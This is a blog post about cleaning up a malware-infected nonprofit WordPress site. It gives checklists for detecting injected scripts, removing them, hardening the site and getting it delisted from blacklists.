This week was pretty busy. One of the non-profits that I know found themselves in quite a predicament – their WordPress site was infected with malware. The site was hacked, and scripts were executed on visitors that did two different things:
- The site tried to infect Microsoft Windows users with malware.
I discovered the WordPress site was hacked when I visited it after clicking through on their latest newsletter, and I immediately notified them of what was going on. Unfortunately, it was quite an aggressive attack that I was able to remove, but immediately reinfected the site upon going live. This is a pretty common practice by malware hackers – they not only hack the site, they also either add an administrative user to the site or alter a core WordPress file that re-injects the hack if removed.
What is Malware?
Malware is an ongoing issue on the web. Malware is utilized to inflate click-through rates on ads (ad fraud), inflate site statistics to overcharge advertisers, try and attain access to visitors’ financial and personal data, and most recently – to mine cryptocurrency. Miners get paid well for mining data but the cost to build mining machines and pay the electric bills for them is significant. By secretly harnessing computers, miners can make money without the expense.
WordPress and other popular platforms are huge targets for hackers since they are the foundation of many websites. WordPress has a theme and plugin architecture that doesn’t automatically protect core files from security holes. Additionally, the WordPress community is outstanding at identifying and patching security holes – but site owners are not as vigilant about keeping their site updated with the latest versions.
This site was hosted on GoDaddy’s traditional web hosting (not GoDaddy’s Managed WordPress hosting), which offers zero protection. Of course, they offer a Malware Scanner and removal service, though. Managed WordPress hosting companies such as Flywheel, WP Engine, LiquidWeb, GoDaddy, and Pantheon all provide automated updates to keep your sites updated when issues are identified and patched. Most have malware scanning and blacklisted themes and plugins to help site owners prevent a hack. Some companies go a step further – Kinsta – a high-performance Managed WordPress host – even offers a security guarantee.
Additionally, the team at Jetpack offers a great service for automatically checking your site for malware and other vulnerabilities daily. This is an ideal solution if you’re self-hosting WordPress on your infrastructure.
You can also utilize third-party malware scanning incorporated into plugins like All-In-One WP Security and Firewall, which will report if your site is blacklisted on active malware monitoring services.
Is Your Site Blacklisted for Malware:
Many sites online promote checking your site for malware, but keep in mind that most of them are not checking your site at all in real-time. Real-time malware scanning requires a third-party crawling tool that can not instantaneously provide results. The sites that provide an instantaneous check are sites that previously found your site had malware. Some of the malware-checking sites on the web are:
- Google Transparency Report – if your site is registered with Webmasters, they’ll immediately alert you when they crawl your site and find malware on it.
- Norton Safe Web – Norton also operates web browser plugins and operating system software that will block users from evening opening your page if they’ve blacklisted it. Website owners can register on the site and request their site be re-evaluated once it’s clean.
- Sucuri – Sucuri maintains a list of malware sites along with a report on where they’ve been blacklisted. If your site is cleaned up, you’ll see a Force a Re-Scan link under the listing (in very small print). Sucuri has an outstanding plugin that detects issues… and then pushes you into an annual contract to remove them.
- Yandex – if you search Yandex for your domain and see “According to Yandex, this site might be dangerous”, you can register for Yandex webmasters, add your site, navigate to Security and Violations, and request your site be cleared.
- Phishtank – Some hackers will put phishing scripts on your site to get your domain listed as a phishing domain. If you enter the exact, full URL of the reported malware page in Phishtank, you can register with Phishtank and vote whether or not it’s truly a phishing site.
Unless your site is registered and you have a monitoring account somewhere, you will probably get a report from a user of these services. Don’t ignore the alert… while you may not see a problem, false positives rarely happen. These issues can get your site de-indexed from search engines and blocked from browsers. Worse, your potential clients and existing customers may wonder what kind of organization they’re working with.
How do You Check for Malware?
Several companies above speak to how difficult it is to find malware, but it’s not quite so difficult. The difficulty is figuring out how it got into your site! Malicious code is most often located in:
- Maintenance – Before anything, point it to a maintenance page and back up your site. Don’t utilize WordPress’ default maintenance or a maintenance plugin as those will still execute WordPress on the server. You want to ensure no one executes any PHP file on the site. While at it, check your .htaccess file on the webserver to ensure it doesn’t have rogue code that may be redirecting traffic.
- Search your site’s files via SFTP or FTP and identify the latest file changes in plugins, themes, or core WordPress files. Open those files and look for any edits that add scripts or Base64 commands (used to hide server-script execution).
- Compare the core WordPress files in your root directory, wp-admin directory, and wp-include directories to see if any new files or different size files exist. Troubleshoot each and every file. Even if you find and remove a hack, keep looking since many hackers leave backdoors to re-infect the site. Don’t simply overwrite or re-install WordPress… hackers often add malicious scripts in the root directory and call the script some other way to inject the hack. The less complex malware scripts typically just insert script files in header.php or footer.php. More complex scripts will actually modify every PHP file on the server with re-injection code so that you have a difficult time removing it.
- Remove third-party advertising scripts that may be the source. I’ve refused to apply new ad networks when I’ve read that they’ve been hacked online.
- Check your posts database table for embedded scripts in the page content. You can do this by doing simple searches using PHPMyAdmin and searching for the request URLs or script tags.
How Do You Remove The Malware
A good friend of mine recently got his WordPress blog hacked. It was quite a malicious attack that could impact his search ranking and, of course, his momentum in traffic. Here’s my advice for what to do if WordPress gets hacked:
- Stay Calm! Don’t start deleting things and installing all kinds of crap that promise to clean your installation up. You don’t know who wrote it and whether or not it’s simply adding more malicious crap to your blog. Take a deep breath, look at this blog post, and slowly and deliberately go down the checklist.
- Take down the blog. Immediately. The easiest way to do this with WordPress is to rename your index.php file in your root directory. It’s not enough to just put up an index.html page… you need to halt all traffic to any page of your blog. In place of your index.php page, upload a text file that says you’re offline for maintenance and will be back soon. The reason you need to take down the blog is that most of these hacks aren’t done by hand; they’re done through malicious scripts that attach themselves to every writeable file in your installation. Someone visiting an internal page of your blog can reinfect the files you’re working to repair.
- Back up your site. Don’t just back up your files, also back up your database. Store it somewhere special if you need to refer to some of the files or information.
- Remove all themes. Themes are an easy means for a hacker to script and insert code into your blog. Most themes are also written poorly by designers who don’t understand the nuances of securing your pages, your code, or your database.
- Remove all plugins. Plugins are the easiest means for a hacker to script and insert code into your blog. Most plugins are written poorly by hack developers that don’t understand the nuances of securing your pages, your code, or your database. Once a hacker finds a file with a gateway, they simply deploy crawlers that search other sites for those files.
- Reinstall WordPress. When I say reinstall WordPress, I mean it – including your theme. Don’t forget wp-config.php, a file that’s not overwritten when you copy over WordPress. In this blog, I found the malicious script was written in Base 64 so it just looked like a blob of text and it was inserted in the header of every single page, including wp-config.php.
- Review your Database. You’ll want to review your options table and your posts table especially – looking for any strange external references or content. If you’ve never looked at your database before, be prepared to find PHPMyAdmin or another database query manager within your host’s management panel. It’s not fun – but it’s a must.
- Startup WordPress with a default theme and no plugins installed. If your content appears and you don’t see any automated redirects to malicious sites, you’re probably okay. If you get a redirect to a malicious site, you’ll probably want to clear your cache to ensure you’re working from the latest copy of the page. You may need to go through your database record by record to try to locate whatever content might be there that’s paving the way into your blog. Chances are your database is clean… but you never know!
- Install Your Theme. If the malicious code replicated, you’re probably going to have an infected theme. You may need to go line by line through your theme to ensure there’s no malicious code. You may be better off just starting out fresh. Open the blog up to a post and see if you’re still infected.
- Install Your Plugins. You may want to use a plugin, first, such as Clean Options first, to remove any additional options from plugins you’re no longer using or wanting. Don’t go crazy though, this plugin is not the best… it often displays and allows you to delete settings you want to hang on to. Download all your plugins from WordPress. Run your blog again!
If you see the issue come back, chances are that you’ve reinstalled a plugin or theme that’s vulnerable OR there was something hidden in the content of your site stored in the database. If the issue never leaves, you’ve probably tried to take a couple shortcuts in troubleshooting these issues. Don’t take a shortcut.
These hackers are nasty folks! Not understanding every plugin and theme file puts us all at risk, so be vigilant. Install plugins that have great ratings, plenty of installations, and a great record of downloads. Read the comments folks have associated with them.
How do You Prevent Your Site from Being Hacked and Malware Installed?
Before you put your site live… it’s now time to harden your site to prevent an immediate re-injection or another hack:
- Verify every user on the website. Hackers often inject scripts that add an administrative user. Remove any old or unused accounts and reassign their content to an existing user. If you have a user named admin, add a new administrator with a unique login and remove the admin account altogether.
- Reset every user’s password. Many sites are hacked because a user used a simple password that was guessed in an attack, enabling someone to get into WordPress and do whatever they’d like.
- Disable the ability to edit plugins and themes via WordPress Admin. The ability to edit these files allows any hacker to do the same if they get access. Make the core WordPress files unwriteable so that scripts can’t rewrite core code. All in One has a really great plugin that provides WordPress hardening with a ton of features.
- Manually download and reinstall the latest versions of every plugin you require and remove any other plugins. Absolutely remove administrative plugins that give direct access to site files or the database, these are especially dangerous.
- Remove and replace all files in your root directory with the exception of the wp-content folder (so root, wp-includes, wp-admin) with a fresh installation of WordPress downloaded directly from their site.
- Diff – You may also wish to do a diff between a backup of your site when you didn’t have malware and the current site… this will help you to see which files had been edited and what changes were made. Diff is a development function that compares directories and files and provides you with a comparison between the two. With the number of updates made to WordPress sites, this isn’t always the easiest method – but sometimes the malware code really stands out.
- Maintain your site! The site I worked on this weekend had an old version of WordPress with known security holes, old users that shouldn’t have access anymore, old themes, and old plugins. It could have been any one of these that opened the company up for getting hacked. If you can’t afford to maintain your site, be sure to move it to a managed hosting company that will! Spending a few more bucks on hosting could have saved this company from this embarrassment.
Once you believe you’ve got everything fixed and hardened, you can bring the site back live by removing the .htaccess redirect. As soon as it’s live, look for the same infection that was previously there. I typically utilize a browser’s inspection tools to monitor network requests by the page. I track down every network request to ensure it’s not malware or mysterious… if it is, it’s back to the top and doing the steps all over again.
Remember – once your site is clean, it will not automatically be removed from blacklists. You should contact each and make the request per our list above.
Getting hacked like this is not fun. Companies charge several hundred dollars to remove these threats. I worked no less than 8 hours to help this company clean up their site.